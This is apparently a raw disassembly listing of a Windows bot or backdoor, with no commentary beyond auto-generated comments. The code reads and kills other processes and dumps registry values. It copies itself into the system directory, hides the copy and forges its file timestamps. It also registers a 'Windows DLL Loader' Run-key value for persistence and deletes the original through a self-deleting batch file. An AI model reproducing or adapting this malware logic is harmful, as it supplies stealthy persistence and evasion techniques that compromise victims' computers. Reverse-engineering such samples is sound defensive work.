cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset dword_418B44
push 0
push [ebp+var_4]
push offset sub_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call ds:dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call ds:dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call ds:dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: sub_403DF3+149�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset dword_418B5C
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset dword_418B54
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call ds:dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DC40
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset dword_418DE0
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DC40
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417040 ; GetWindowsDirectoryA
push offset dword_418DE8
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_417048 ; GetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_41704C ; SetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call ds:dword_41703C ; lstrlen
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call ds:dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call ds:dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call ds:dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_417068 ; WriteFile
push [ebp+var_28]
call ds:dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: sub_4167F1:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call ds:dword_4170AC ; DeleteFileA
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset dword_41EB2C
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
lea eax, [ebp+var_324]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call ds:dword_41707C ; CreateProcessA
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
